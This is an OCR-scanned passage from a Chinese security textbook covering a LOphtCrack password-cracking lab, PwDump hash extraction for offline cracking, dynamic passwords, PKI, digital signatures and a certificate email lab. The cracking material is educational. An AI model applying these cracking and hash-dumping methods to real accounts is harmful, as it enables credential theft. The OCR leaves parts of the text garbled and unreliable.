即 穷 举 法 和 字典 法 。 穷 举 法 就 是 效率 最 低 的 办 法 ,将 字符 或 数字 按照 穷 举 的 规则 生成 口令 
字符 串 ,进行 遍历 尝试 。 在 口令 稍微 复杂 的 情况 下 , 穷 举 法 的 破解 速度 很 低 。 字 典 法 相对 来 
说 效率 较 高 , 它 用 口令 字典 中 事先 定义 的 常用 字符 去 尝试 匹配 口令 。 

口令 字典 是 一 个 很 大 的 文本 文件 .可 以 通过 自己 编辑 或 者 由 字典 工具 生成 ,里 面包 含 了 
单词 或 者 数字 的 组 合 。 如 果 口 令 就 是 一 个 单词 或 者 是 简单 的 数字 组 合 ,那么 破解 者 就 可 以 
很 轻易 地 破解 口令 。 目 前 常见 的 口令 破解 和 审核 工具 有 很 多 种 ,例如 破解 Windows 平台 口 
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令 的 LOphtCrack、WMICracker、SMBCrack CNIPC NT 弱 口令 终结 者 ,以 及 Elcomsoft 公 
司 的 Advanced NT Security Explorer 和 Proactive Windows Security Explorer、 Winternals 
的 Locksmith 等 商用 工具 .用 于 UNIX 平台 的 有 John the Ripper 等 。 本 实验 主要 通过 
LOphtCrack 的 使 用 ,了 解 用 户口 令 的 安全 性 。 

LOphtCrack 是 最 著名 的 Windows 口令 破解 软件 .可 从 网 络 上 下 载 。LOphtCrack 能 直 
接 从 注册 表 文件 系统 、 备 份 磁盘 中 或 是 在 网 络 传输 的 过 程 中 找到 口令 。LOphtCrack 开始 
破解 的 第 一 步 是 精简 操作 系统 存储 加 密 口 令 的 hash 列表 。 之 后 才 开始 口令 的 破解 ,这 个 过 
程 称 为 cracking。 


【实验 要 求 】 

(1) 在 主机 内 用 命令 行 命令 net user 建立 如 下 用 户 和 设置 口令 : 
用 户 名 口令 

test1 空 密码 

test2 888888 

test3 yoursecurity 

test4 5354. 8861 


在 Windows 7 下 进行 LOph 破解 测试 。 
(2) 根据 实验 填写 表 9-1。 


表 9-1 比较 破解 时 间 ( 未 启动 syskey) 


用 户 口 令 能 否 破 解 破解 时 间 破解 方法 原 因 
Testl 空 

Test2 888888 

Test3 yoursecurity 

Test4 5354. 8861! 

结论 


(3) 请 贴 出 上 述 破 解 的 Report 截图 。 

(4) 破解 过 程 中 ,CPU 运转 情况 如 何 ? 请 贴 出 截图 并 简要 说 明 。 

(5) 如 果 将 破解 不 了 的 口令 加 入 字典 ,或 在 Session Options 窗口 中 设置 自 定义 字符 
集 , 是 不 是 就 可 以 破解 ? 

(6) 启用 Windows 的 口令 破解 防护 syskey, 重 做 要 求 (4) ,将 实验 数据 填 入 表 9-2。 


表 9-2 比较 破解 时 间 ( 启 动 syskey) 


用 户 口 令 能 否 破 解 破解 时 间 破解 方法 原 因 
Testl 室 

Test2 888888 

Test3 yoursecurity 

Test4 5354. 8861! 

结论 
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【实验 思考 】 

(1) 使 用 LOphtCrack 破解 口令 时 ,如 果 没 有 采用 口令 字典 ,破解 还 能 进行 吗 ? 请 举例 
说 明 。 

(2) 在 口令 破解 中 ,有 时 用 到 彩虹 表 (rainbow table)。 彩 虹 表 就 是 一 张 采 用 各 种 加 密 
算法 生成 的 明文 和 密 文 的 对 照 表 。 请 查 相关 资料 ,结合 本 实验 讲述 对 彩虹 表 在 破解 中 的 作 
尾 的 理解 。 

(3) 讨论 : 口令 安全 与 口令 破解 的 技术 将 如 何 发 展 ? 

本 实验 在 破解 口令 时 CPU 的 使 用 率 常 达到 100% ,因而 对 攻击 者 而 言 并 不 适合 这 类 在 
线 破解 方式 。Windows 口令 文件 的 破解 还 有 一 个 安全 克星 一 一 PwDumop, 它 是 一 个 小 型 
的 .易于 使 用 的 命令 行 工具 。 它 并 不 是 一 个 口令 破解 程序 ,但 是 能 用 来 从 SAM 数据 库 中 提 
取 口 令 散 列 值 。 其 官方 网 站 为 http://www. foofius. net/fizzgig/pwdump/。 

PwDump 能 获取 当前 系统 口令 数据 库 文件 中 可 枚 举 账号 的 散 列 值 , 生 成 LOphtCrack 
格式 文件 (实际 上 是 文本 文件 ) ,然后 可 用 LOphtCrack 或 等 效 工具 进行 离线 暴力 破解 。 像 本 
书 第 6 章 的 实例 6-4 ,攻击 者 进入 目标 机 后 ,就 利用 PwDump 获取 口令 文件 ,然后 回 传 给 攻 
击 机 ,由 攻击 机 进行 破解 。 

一 些 口令 并 不 需要 大 费 周 章 地 进行 “破解 ”而 只 需 “ 嗅 探 ” 就 能 获得 以 明文 传输 的 口令 ， 
例如 FTP 的 登录 口令 。 这 种 危险 可 通过 一 些 安全 措施 来 弥补 ,而 不 必 简 单 地 放弃 该 协议 。 
关于 FTP 的 口令 安全 实例 ,读者 可 通过 本 章 习 题 中 的 第 4 题 来 理解 。 


9.3 动态 口令 身份 认证 


动态 口令 就 是 随机 变化 的 一 种 口令 形式 ,每 次 登录 使 用 的 口令 都 不 相同 。 在 一 定 的 时 
间 间 隔 内 ,一 个 口令 只 能 使 用 一 次 ,重复 使 用 的 口令 将 被 拒绝 接受 。 动 态 口 令 的 主要 思想 是 
在 登录 过 程 中 加 入 一 些 不 确定 因素 (如 时 间 、 使 用 次 数 、 随 机 数 等 ), 以 这 些 不 断 变化 的 因素 
作为 口令 的 动态 因子 以 提高 登录 过 程 中 的 安全 性 。 

动态 口令 身份 认证 是 现在 研究 较 多 并 且 技术 相对 比较 成 熟 的 认证 方式 , 它 克 服 了 静态 
口令 技术 所 固有 的 许多 缺点 。 动 态 口令 身份 认证 的 实现 方式 主要 有 时 间 同 步 方 式 、 挑 战 /应 
答 方式 。 

1. 时 间 同 步 机 制 身 份 认证 

时 间 同 步 机 制 身份 认证 是 在 服务 器 时 间 和 用 户 持 有 令 牌 时 间 保 持 同 步 的 基础 上 ,将 时 
间作 为 动态 口令 的 不 确定 因子 ,认证 的 双方 都 采用 相同 的 复杂 的 数学 运算 来 产生 一 致 的 用 
户 登 录 的 动态 口令 。 只 有 合法 用 户 才能 持 有 该 令 牌 ,一 般 该 令 牌 的 刷新 率 为 60s, 即 每 60s 
产生 一 个 新 的 一 次 性 口令 。 由 于 每 个 用 户 的 种 子 密 钥 不 同 ,不 同 用 户 在 同一 时 刻 的 动态 口 
令 也 不 同 。 同 时 该 口令 只 能 在 当时 有 效 ,不必 担心 被 他 人 截取 ,因此 能 保证 很 高 的 安全 性 。 
时 间 同 步 机 制 具有 操作 简单 、 携 带 方便 、 使 用 容易 等 特点 ,只 需要 单 向 传输 认证 信息 即 可 。 
缺点 是 认证 信息 容易 被 劫持 和 重 放 , 且 服务 器 和 客户 端的 时 间 需 要 严格 同步 ,由 于 数据 在 网 
络 上 传输 和 处 理 都 有 一 定 的 延迟 ,如 果 时 间 误 差 超过 允许 值 ,会 导致 正常 用 户 的 登录 认证 
失败 。 
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2. 挑战 /应 答 机 制 身份 认证 

挑战 /应 答 机 制 身 份 认证 技术 的 基本 思想 是 : 由 系统 (认证 方 ) 随 机 产生 一 个 挑战 字 串 
发 送 给 客户 端 ,客户 端 程序 收 到 这 个 ”挑战 ? 字 串 后 ,将 该 挑战 字 串 与 自己 的 认证 信息 用 特定 
的 算法 生成 一 个 动态 口令 ,做 出 相应 的 应答。 以 此 机 制 而 研制 的 系统 认证 过 程 如 下 : 

(1) 用 户 向 认证 服务 器 发 出 请 求 , 要 求 进行 身份 认证 。 

(2) 认证 服务 器 从 用 户 数据 库 中 查询 用 户 是 否 为 合法 的 用 户 , 若 不 是 , 则 不 做 进一步 
处 理 。 

(3) 认证 服务 器 内 部 产生 一 个 随机 数 ,作为 "提问 ”发送 给 用 户 。 

(4) 用 户 将 用 户 名 字 和 随机 数 合并 ,使 用 单 向 散 列 函数 (例如 MD5 算法 ) 生 成 一 个 字 节 
串 作 为 应 答 。 

(5) 认证 服务 器 将 应 答 串 与 自己 的 计算 结果 比较 , 若 二 者 相同 , 则 通过 一 次 认证 ;和 否则， 
认证 失败 。 

(6) 认证 服务 器 通知 用 户 认证 成 功 或 失败 。 

由 于 该 机 制 运算 机 理 没有 严格 同步 的 要 求 ,因而 能 够 从 根本 上 避免 失 步 的 问题 。 缺 点 
是 用 户 操 作 较 为 复杂 ,基于 软件 的 异步 机 制 可 能 会 需要 多 次 认证 ,通信 步骤 较为 复杂 。 

基于 挑战 /应 管 机 制 的 另 一 种 技术 是 “基于 口令 序列 方式 的 动态 口令 身份 认证 技术 ”。 
该 技术 将 口令 序列 视 为 一 系列 前 后 相关 的 口令 服务 器 ,只 记录 第 N 次 登录 的 口令 , 当 用 户 
第 N 一 1 次 登录 系统 时 ,服务 器 用 单 向 散 列 算法 算出 第 NN 次 的 口令 ,并 与 保存 的 第 N 次 的 
正确 口令 进行 匹配 来 对 用 户 的 身份 进行 认证 。 基 于 口令 序列 的 一 次 性 口令 身份 认证 系统 
S/Key 是 一 种 基于 具有 单 向 性 和 唯一 性 的 散 列 函 数 的 一 次 性 口令 生成 方案 。 该 协议 的 安 
全 隐患 在 于 迭代 次 数 是 有 限 的 ,用 户 登 录 一 定 次 数 之 后 必须 重新 初始 化 系统 ,得 到 新 的 迭代 
次 数 。 并 且 前 后 口令 通过 哈 希 运算 具有 相关 性 ,这 种 相关 性 使 得 攻击 者 可 以 通过 身份 冒充 
对 认证 过 程 进行 中 间 人 攻击 。 这 个 安全 隐患 使 得 S/Key 协议 无 法 应 用 于 对 安全 性 要 求 更 
高 的 环境 中 。 

上 述 两 种 动态 口令 身份 认证 机 制 相 比 ,时 间 同 步 机 制 具有 操作 简单 、 携 带 方便 、 使 用 容 
易 等 特点 ,但 是 时 间 同 步 机 制 要 求 令 牌 和 中 心服 务 器 在 时 间 上 保持 一 致 。 而 挑战 /应 管 机 制 
则 不 受 时间 的 限制 。 挑 战 /应 答 机 制 客户 端 计算 量 小 ,不 对 硬件 有 特殊 要 求 ,而 且 抗 中 间 人 
攻击 能 力 强 ,安全 性 较 高 ,特别 是 不 必 保持 严格 的 同步 ,比较 适合 灵活 性 强 、 成 本 较 低 的 情 
况 。 另 外 ,挑战 /应 答 机 制 还 可 以 实现 对 数据 的 加 密 传送 ,但 时 间 同 步 机 制 不 能 做 到 这 一 点 。 

虽然 这 些 改进 方法 大 大 提高 了 用 户 名 /口令 认证 方式 的 安全 性 ,但 是 用 户 名 /口令 身份 
认证 方式 的 弱点 并 没有 得 到 本 质 上 的 改变 。 


9.4 PKI 数 字 证 书 技术 


PKI(Public Key Infrastructure, 公 钥 基 础 设施 ) 是 目前 网 络 安全 建设 的 基础 与 核心 ,从 
技术 上 解决 了 网 络 通信 安全 的 种 种 障碍 ,其 在 网 络 信息 空间 的 地 位 与 其 他 基础 设施 在 人 们 
生活 中 的 地 位 非常 类 似 。PKI 通过 延伸 到 用 户 的 接口 为 各 种 网 络 应 用 提供 安全 服务 ,包括 
身份 认证 .数字 签名 加密、 时 间 惟 等 。 一 方面 PKI 对 网 络 应 用 提供 广泛 而 开放 的 支撑 ; 另 
一 方面 PKI 系统 的 设计 、 开 发 .生产 及 管理 都 可 以 独立 进行 ,不 需要 考虑 应 用 的 特殊 性 。 
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PKI 采 用 证 书 进行 公 钥 管理 ,通过 第 三 方 的 可 信任 机 构 ( 认 证 中 心 , 即 CA) 把 用 户 的 公 钥 和 
用 户 的 其 他 标识 信息 捆绑 在 一 起 ,其 中 包括 用 户 名 和 电子 邮件 地 址 等 信息 ,以 在 Internet 上 
验证 用 户 的 身份 。 

PKI 的 主要 目的 是 通过 自动 管理 密 钥 和 证 书 ,为 用 户 建立 一 个 安全 的 网 络 运行 环境 ,使 
用 户 可 以 在 多 种 应 用 环境 下 方便 地 使 用 加 密 和 数字 签名 技术 ,从 而 保证 网 上 数据 的 机 密 性 、 
完整 性 、 有 效 性 。 数 据 的 机 密 性 是 指数 据 在 传输 过 程 中 不 能 被 非 授 权 者 偷 看 ;数据 的 完整 性 
是 指数 据 在 传输 过 程 中 不 能 被 非法 算 改 ;数据 的 有 效 性 是 指数 据 的 不 可 否认 性 , 即 参加 某 次 
通信 交换 的 一 方 事后 不 可 否认 本 次 交换 曾经 发 生 过 。 

PKI 主要 包括 证 书 机 构 、 注 册 机 构 .证 书签 发 系统 和 PKI 策略 等 ,如 图 9-1 所 示 。 


PKI 应 用 
| 
| | 证 书 机 构 注册 机 构 | 证 书签 发 系统 |]! 
| pp J 

OO 

1 | PKI 策略 。 ”| |[ 软 硬 件 系统 | 

一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 J 
图 9-1 PKI 组 成 


1. 证 书 机 构 

证 书 机 构 (Certificate Authority,CA, 也 称 认 证 中 心 ) 是 PKI 的 核心 , 它 管理 公 钥 的 整 
个 生命 周期 。CA 的 作用 主要 包括 如 下 几 个 方面 : 

(1) 发 放 证 书 ,用 数字 签名 绑 定 用 户 或 系统 的 识别 号 和 公 钥 。 

(2) 规定 证 书 的 有 效 期 。 

(3) 通过 发 布 证 书 废 除 列表 (CRL) 确 保 必 要 时 可 以 废除 证 书 。 

2. 注册 机 构 

注册 机 构 (Registration Authority,RA) 是 CA 证 书 发 放 、 管 理 的 延伸 ,负责 审核 证 书 申 
请 者 的 真实 身份 ,在 审核 通过 后 ,负责 将 用 户 信 息 通 过 网 络 上 传 到 CA, 由 CA 负责 最 后 的 制 
证 处 理 。 证 书 的 吊销 .更 新 也 需要 由 注册 机 构 提交 给 CA 处 理 。 也 就 是 说 ,CA 是 面向 各 注 
册 机 构 的 ,而 注册 机 构 是 面向 最 终 用 户 的 .注册 机 构 是 用 户 与 CA 的 中 间 渠 道 , 起 承上启下 
的 作用 。 

3. 证 书签 发 系统 

证 书 通过 证 书签 发 系统 (Certificate Distribution System,CDS) 对 外 公开 发 布 ,用 户 可 
在 此 获取 其 他 用 户 的 证 书 。 证 书 的 发 布 可 以 有 多 种 途径 ,比如 ,用 户 可 以 自己 发 布 ,或 是 通 
过 目录 服务 器 向 外 发 布 。 

4. PKI 策略 

PKI 策略 在 系统 中 的 实现 包括 两 个 方面 ,一 个 是 制定 、 撰 写 策 略 并 发 布 出 去 , 男 一 个 是 
策略 在 系统 设计 中 的 实现 。 

一 般 情 况 下 ,在 PKI 中 有 两 种 类 型 的 策略 : 一 种 是 证 书 策略 ,用 于 管理 证 书 的 使 用 , 比 
如 ,可 以 确认 某 一 CA 是 在 Internet 上 的 公有 CA 还 是 某 一 企业 内 部 的 私有 CA; 另 一 种 就 
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是 CPS(Certificate Practice Statement, 证 书 操作 管理 规范 )。 一 些 商 业 证 书 发 放 机 构 
(CCA) 或 者 可 信 的 第 三 方 操作 的 PKI 系统 需要 CPS。 这 是 一 个 包含 如 何在 实践 中 增强 和 
支持 安全 策略 的 一 些 操作 过 程 的 详细 文档 。 它 包括 CA 是 如 何 建立 和 运作 的 ,证 书 是 如 何 
发 行 、 接 收 和 废除 的 , 密 钥 是 如 何 产生 .注册 的 , 密 钥 是 如 何 存储 的 ,用 户 是 如 何 得 到 它 的 
等 等 。 

以 数字 证 书 为 核心 的 PKI/CA 技术 可 以 对 网 络 上 传输 的 信息 进行 加 密 和 解密 、 数 字 签 
名 和 签名 验证 ,从 而 保证 信息 除 发 送 方 和 接收 方 外 不 被 其 他 人 窃取 ,信息 在 传输 过 程 中 不 被 
算 改 ,接收 方 能 够 通过 数字 证 书 来 确认 发 送 方 的 身份 .发送 方 对 于 自己 的 信息 不 能 抵赖 。 


9.5 数字 签名 技术 


数字 签名 (又 称 公 钥 数 字 签 名 .电子 签 章 ) 是 使 用 公 钥 加 密 领 域 的 技术 实现 的 ,用 于 鉴别 
数字 信息 的 方法 。 数 字 签 名 即 只 有 信息 的 发 送 者 才能 产生 的 别人 无 法 伪造 的 一 段 数字 串 ， 
这 段 数 字 串 同时 也 是 对 信息 的 发 送 者 发 送信 息 真 实 性 的 一 个 有 效 证 明 。 这 是 通过 密码 技术 
对 电子 文档 的 电子 形式 的 签名 ,类 似 于 现实 生活 中 传统 的 手写 签名 (或 印章 ) ,而 非 书面 签名 
的 数字 图 像 化 。 

1. 数字 签名 原理 

基于 公 钥 密码 体制 和 私 钥 密码 体制 都 可 以 获得 数字 签名 ,包括 普通 数字 签名 和 特殊 数 
字 签 名 。 普 通 数字 签名 算法 有 RSA、ElGamal、Fiat-Shamir、Guillou-Quisquater、 Schnorr、 
Ong-Schnorr-Shamir 数字 签名 算法 .DES/DSA 、 椭 圆 曲 线 数字 签名 算法 和 有 限 自动 机 数字 
签名 算法 等 。 数 字 签 名 是 解决 网 络 通信 中 特有 安全 问题 的 一 种 有 效 方法 , 它 能 够 实现 电子 
文档 的 辨认 和 验证 ,在 保证 数据 的 完整 性 .私有 性 、 不 可 抵赖 性 方面 起 着 极其 重要 的 作用 。 
为 了 实现 网 络 环境 下 的 身份 鉴别 .数据 完整 性 认证 和 抗 否 认 的 功能 ,数字 签名 应 满足 以 下 要 
求 : (1) 签 名 者 发 出 签名 的 消息 后 ,就 不 能 再 否认 自己 所 签发 的 消息 ; (2) 接 收 者 能 够 确认 
或 证 实 签名 者 的 签名 ,但 不 能 否认 ; (3) 任 何人 都 不 能 伪造 签名 ; (4) 第 三 方 可 以 确认 收发 
双方 之 间 的 消息 传送 ,但 不 能 伪造 这 一 过 程 , 当 通 信 的 双方 关于 签名 的 真 伪 发 生 争执 时 ,可 
由 第 三 方 来 解决 双方 的 争执 。 

一 套数 字 签 名 通常 定义 两 种 互补 的 运算 ,一 个 用 于 签名 , 另 一 个 用 于 验证 。 发 送 报 文 
时 ,发 送 方 用 一 个 哈 希 函数 从 报 文 文本 中 生成 报 文摘 要 ,然后 用 自己 的 私人 密 钥 对 这 个 摘要 
进行 加 密 , 这 个 加 密 后 的 摘要 将 作为 报 文 的 数字 签名 和 报 文 一 起 发 送 给 接收 方 ;接收 方 首先 
用 与 发 送 方 一 样 的 哈 希 函数 从 接收 到 的 原始 报 文中 计算 出 报 文摘 要 ,接着 再 用 发 送 方 的 公 
用 密 钥 来 对 报 文 附加 的 数字 签名 进行 解密 ,如 果 这 两 个 摘要 相同 ,那么 接收 方 就 能 确认 该 数 
字 签 名 是 发 送 方 的 。 其 原理 如 图 9-2 所 示 。 

数字 签名 有 两 种 重要 作用 。 其 一 是 能 确定 消息 确实 是 由 发 送 方 签 名 并 发 出 来 的 ,因为 
别人 假冒 不 了 发 送 方 的 签名 。 其 二 是 数字 签名 能 确定 消息 的 完整 性 。 因 为 数字 签名 的 特点 
是 它 代 表 了 文件 的 特征 ,文件 如 果 发 生 改变 ,数字 摘要 的 值 也 将 发 生变 化 。 不 同 的 文件 将 得 
到 不 同 的 数字 摘要 。 一 次 数字 签名 涉及 一 个 哈 希 函数 .发送 者 的 公 钥 ,发 送 者 的 私 钥 。 

数字 签名 算法 依靠 公 钥 加 密 技 术 来 实现 的 。 每 一 个 使 用 者 有 一 密 钥 对 ( 公 钥 , 私 钥 ) 。 
公 钥 可 以 自由 发 布 ,但 私 钥 则 秘密 保存 。 通 过 公 钥 不 能 推算 出 私 钥 。 
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图 9-2 数字 签名 原理 


假如 网 络 上 Alice 要 向 Bob 传送 数字 信息 ,为 了 保证 信息 传送 的 保密 性 、 真 实 性 \ 完 整 
性 和 不 可 否认 性 ,需要 对 传送 的 信息 进行 数字 加 密 和 签名 ,其 传送 过 程 可 描述 如 下 : 

(1) Alice 准备 好 要 传送 的 数字 信息 (明文 )。 

(2) Alice 对 数字 信息 进行 哈 希 运算 ,得 到 一 个 信息 摘要 。 

(3) Alice 用 自己 的 私 钥 对 信息 摘要 进行 加 密 得 到 Alice 的 数字 签名 ,并 将 其 附 在 数字 
信息 上 。 

(4) Alice 随机 产生 一 个 加 密 密 钥 ,并 对 要 发 送 的 信息 进行 加 密 ,形成 密 文 。 

(5) Alice 用 Bob 的 公 钥 对 刚才 随机 产生 的 加 密 密 钥 进行 加 密 ,将 加 密 后 的 DES 密 钥 
连同 密 文 一 起 传送 给 Bob。 

(6) Bob 收 到 Alice 传送 来 的 密 文 和 加 密 过 的 DES 密 钥 , 先 用 自己 的 私 钥 对 加 密 的 
DES 密 钥 进行 解密 ,得 到 Alice 随机 产生 的 加 密 密 钥 。 

(7) Bob 用 随机 密 钥 对 收 到 的 密 文 进行 解密 ,得 到 明文 的 数字 信息 ,然后 将 随机 密 钥 
抛弃 。 

(8) Bob 用 Alice 的 公 钥 对 Alice 的 数字 签名 进行 解密 ,得 到 信息 摘要 。 

(9) Bob 用 相同 的 哈 希 算法 对 收 到 的 明文 再 进行 一 次 哈 希 运算 ,得 到 一 个 新 的 信息 
摘要 。 

(10) Bob 将 收 到 的 信息 摘要 和 新 产生 的 信息 摘要 进行 比较 ,如 果 一 致 ,说 明 接 收 到 的 
信息 没有 被 修改 过 。 

2. 数字 签名 验证 工具 

通常 ,系统 文件 都 经 过 签名 ,例如 Windows 的 系统 文件 就 都 经 过 数字 签名 。 查 看 文件 
的 数字 签名 ,只 须 选 定 文件 ,通过 快捷 菜单 的 “属性 ”命令 打开 “属性 ”对 话 框 ,在 “详细 信息 ” 
选项 卡 中 就 可 以 看 到 签名 情况 。 查 看 文件 的 数字 签名 还 可 使 用 数字 签名 验证 程序 
sigcheck. exe( 可 由 网 上 下 载 ) 。sigcheck 是 数字 签名 验证 工具 ,可 以 查看 指定 的 文件 或 目录 
下 的 哪些 文件 有 没有 数字 签名 。 此 工具 是 命令 行 工具 ,其 语法 如 下 : 


sigcheck [-a][-h]l[-il[-el[-nl[[-s]l[-v]1l[-m]][-qg]l[-zr][-u][-ccatalog file] 
<file or directory> 
选项 如 下 : 
-a 显示 扩展 版 本 信息 。 
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-c 在 指定 的 编 录 文件 中 查找 签名 。 

-e 只 扫描 可 执行 映像 (无 论 扩展 名 是 什么 )。 

-h 显示 文件 的 哈 希 值 。 

-i 显示 映像 签名 者 。 

-m 转 储 清单 (dump manifest) 。 

-n 只 显示 版 本 号 。 

-q 静默 (无 标语 )。 

检查 证 书 撤销 (check for certificate revocation)。 

-s 对 子 目 录 执 行 递归 操作 。 

-u 只 显示 未 签名 的 文件 。 

-v 以 CSV 格式 显示 输出 内 容 。 

sigcheck 可 以 用 来 检查 某 个 文件 夹 下 相关 文件 (单个 文件 或 批量 文件 ) 的 数字 签名 。 例 
如 ,检查 文件 notepad. exe 的 数字 签名 命令 如 下 : 


sigcheck c:\Windows\System32\notepad.exe 


就 可 以 检查 签名 日 期 .发 布 人 、 描 述 .产品 名 ,版 本 号 .原始 文件 名 .版 权 人 等 信息 。 

检查 一 批文 件 的 数字 签名 ,由 于 文件 可 能 比较 多 ,如 果 直接 从 屏幕 显示 阅读 检查 结果 很 
不 方便 ,可 将 检查 结果 通过 重 定向 符 之 写 和 人 一 个 文本 文件 中 ,以 利于 阅读 。 下 面 的 命令 检查 
Windows 的 System32 的 文件 夹 中 文件 的 签名 情况 ,并 将 检查 结果 中 未 经 过 数字 签名 的 文 
件 写 入 文件 checkout. txt 中 : 


sigcheck -u -e c:\windows\system32 > checkout .txt 


检查 文件 checkout. txt 中 的 内 容 , 对 其 中 出 现 的 未 签名 文件 的 安全 性 进行 甄别 。 

数字 签名 是 分 辩 系 统 程序 和 可 疑 程序 的 依据 , Windows 的 重要 文件 都 有 签名 ,而 混 进 
其 中 的 可 疑 程序 则 没有 签名 。 正 常 有 签名 的 文件 ,其 Verified 显示 Signed, 反 之 显示 
Unsigned。 

实验 9-2 ”数字 认证 实例 

【实验 目的 】 

(1) 了 解 公 钥 基础 设施 与 认证 链 , 理 解 认 证 机 构 间 的 关系 结构 。 

(2) 了 解 CA。 

(3) 了 解 中 国 CA 的 发 展 情况 。 

【实验 内 容 】 

(1) 登录 中 国 数字 认证 网 (http://www. ca365. com/) 为 自己 申请 个 人 测试 数字 证 书 。 

(2) 数字 证 书 的 导入 和 导出 。 

(3) 发 送 数字 签名 电子 邮件 。 

(4) 发 送 PKI 加 密 邮 件 。 

【实验 环境 】 

Windows,Internet,Internet Explorer。 

【实验 步骤 】 

步骤 1: 申请 个 人 测试 数字 证 书 。 
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(1) 登录 中 国 数字 认证 网 为 自己 申请 个 人 测试 数字 证 书 。 

(2) 根据 “申请 试用 型 个 人 数字 证 书 ” 的 提示 ,选择 安装 证 书 链 。 

(3) 选择 “安装 证 书 链 ” 后 ,在 系统 提示 “完成 "后 ,再 选择 “继续 ”。 

(4) 进入 “申请 试用 型 个 人 数字 证 书 ” 的 第 二 步 , 即 填写 并 提交 申请 表格 。 在 该 页 面 中 ， 
需要 按照 系统 的 提示 填写 真实 信息 。 填 写 完 后 , 单 击 “ 提 交 ” 按 钮 ,系统 开始 签发 数字 证 书 。 

(5) 系统 受理 并 签发 数字 证 书后 ,下载 并 安装 数字 证 书 。 此 时 系统 会 给 出 一 个 “证 书 业 
务 受理 号 "和 密码 。 

(6) 单 击 “ 安 装 证 书 ”, 系统 将 把 证 书 安装 在 计算 机 的 应 用 程序 中 。 

注意 :“ 证 书 用 途 ” 必 须 选择 “电子 邮件 保护 证 书 ”。 

步 又 2: 证 书 的 导入 /导出 。 

(1) 根 证 书 的 导出 。 

@ 启动 IE, 选择 “工具 ”一 “Internet 选项 ”一 “内 容 ” 一 “证 书 ”>“ 受 信任 的 根 目 录 颁 发 
机 构 ”, 选 中 要 导出 的 根 证 书 。 

@ 单 击 "导出 ”按钮 后 ,出 现 证 书 管理 器 导出 向 导 界 面 ,按照 向 导 提 示 操 作 , 向 导 会 提示 
选择 证 书 导 出 的 格式 ,一 般 选择 系统 默认 值 。 

@ 之 后 系统 会 提示 选择 导出 文件 的 路 径 。 选 择 好 文件 的 路 径 后 , 按 提示 单 击 “ 下 一 步 ” 
按钮 ,直至 系统 出 现 证 书 导出 成 功 的 提示 , 便 完成 了 根 证 书 导 出 过 程 。 

(2) 数字 证 书 的 导出 。 

@ 在 正中 ,选择 "工具 ”Internet 选项 ”一 “内 容 ”>“ 证 书 ”, 选 择 “ 个 人 ”标签 栏 ,选择 
“数字 证 书 ”, 单 击 “ 导 出 ”按钮 ,系统 提示 "欢迎 使 用 证 书 导出 向 导 ”, 进 入 证 书 管理 器 导出 向 
导 程 序 。 

@ 系统 询问 是 否 将 私 钥 跟 证 书 一 起 导出 ,选择 “是 ”, 导 出 私 钥 ( 如 果 在 申请 数字 证 书 时 
选择 的 存储 介质 为 非 本 地 计算 机 ,此 时 系统 导出 私 钥 项 为 不 可 用 状态 )。 

@ 按照 系统 提示 选择 导出 证 书 的 格式 ,如 果 导 出 了 私 钥 的 数字 证 书 文件 , 则 格式 
为 PFX。 

@ 在 导出 私 钥 时 ,系统 会 提示 要 求 输入 私 钥 保护 密码 ,为 了 防止 第 三 方 非法 使 用 数字 
证 书 ,需要 输入 私 钥 保 护 密码 。 单 击 “ 下 一 步 ” 按 钮 ,在 出 现 的 对 话 框 中 还 需要 选择 导出 文件 
的 路 径 和 文件 名 。 至 此 ,证 书 管理 器 导出 向 导 完成 导出 任务 。 

步骤 3: 发 送 具 有 数字 签名 的 电子 邮件 。 

在 发 送 签名 邮件 之 前 ,首先 要 下 载 数字 证 书 , 即 将 申请 的 数字 证 书 导 入 到 系统 中 ;之 后 
还 必须 将 数字 证 书 与 电子 邮件 绑 定 ,也 就 是 还 必须 完成 “在 Outlook Express 中 设置 数字 证 
书 ”, 使 电子 邮件 账号 对 应 相应 的 数字 证 书 ;这 些 事 做 完 之 后 才能 发 送 数字 签名 电子 邮件 。 

(1) 在 Outlook Express 中 设置 数字 证 书 。 在 Outlook Express 中 ,选择 “工具 ”菜单 中 
的 “账号 ”命令 ,在 对 话 框 中 选择 邮件 ”选项 卡 , 单 击 “ 属 性 ”按钮 ,选择 “安全 ”选项 卡 , 单 击 
“选择 ”按钮 ,选择 后 单 击 “ 确 定 ” 按 钮 。 

如 果 前 面 申请 证 书 时 没有 正确 选择 “证 书 用 途 ”, 这 一 步 可 能 出 现 问 题 。 

(2) 发 送 签名 电子 邮件 。 

用 自己 的 安全 电子 邮件 证 书 发 一 封 签名 邮件 ,内容 为 安全 电子 邮件 证 书 的 信息 (包括 自 
己 的 公 钥 ) ,主题 为 学 号 和 姓名 。 
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@ 打开 Outlook Express, 单 击 新 邮件 按钮 :撰写 新 邮件 。 

请 贴 出 截图 。 

@ 选取 工具 菜单 中 的 数字 签名 。 

请 贴 出 截图 。 

对 比 选取 数字 签名 前 后 的 异同 ,在 信 的 右上 角 有 没有 出 现 一 个 签名 的 标记 ? 

@ 单 击发 送 ” 按 钮 发 送 数字 签名 邮件 。 

发 送 邮件 的 时 候 有 没有 出 现 服务 器 拒绝 接收 的 情况 ?” 如果 有 ,如 何 处 理 ? 

@ 当 收 件 人 打开 信件 时 ,将 看 到 “数字 签名 邮件 ”的 提示 信息 。 

@ 单 击 “ 继 续 ? 按 钮 后 可 阅读 到 该 邮件 的 内 容 。 若 邮件 在 传输 过 程 中 被 他 人 自 改 或 发 
信人 的 数字 证 书 有 问题 ,页 面 将 出 现 “ 安 全 警告 "提示 。 

步骤 4: 发 送 加 密 邮 件 。 

(1) 获得 对 方 的 数字 证 书 。 

方法 : 从 带 有 数字 签名 的 电子 邮件 中 添加 。 

Q@ 让 对 方 给 自己 发 送 有 其 数字 签名 的 邮件 。 

@ 将 该 邮件 打开 ,然后 选择 “文件 "菜单 中 的 “属性 ”命令 。 

@ 在 “属性 ”对 话 框 中 选取 “安全 ”选项 卡 并 单 击 “ 将 数字 标识 添加 到 通讯 德 中 ”按钮 ,这 
样 对 方 数字 证 书 就 被 添加 到 自己 的 通讯 笑 中 了 。 

@ 可 以 在 Internet Explorer 选择 “工具 ”菜单 ( 单 击 其 图 标 密 ), 单 击 "Internet 选项 ”, 选 
中 “内 容 ” 选 项 卡 , 单 击 “ 证 书 ” 按 钮 ,可 查看 到 对 方 的 数字 证 书 。 

(2) 发 送 加 密 邮件 。 

Q@ 撰写 好 信件 后 ,选取 “工具 ”菜单 中 的 加密” 命令 。 

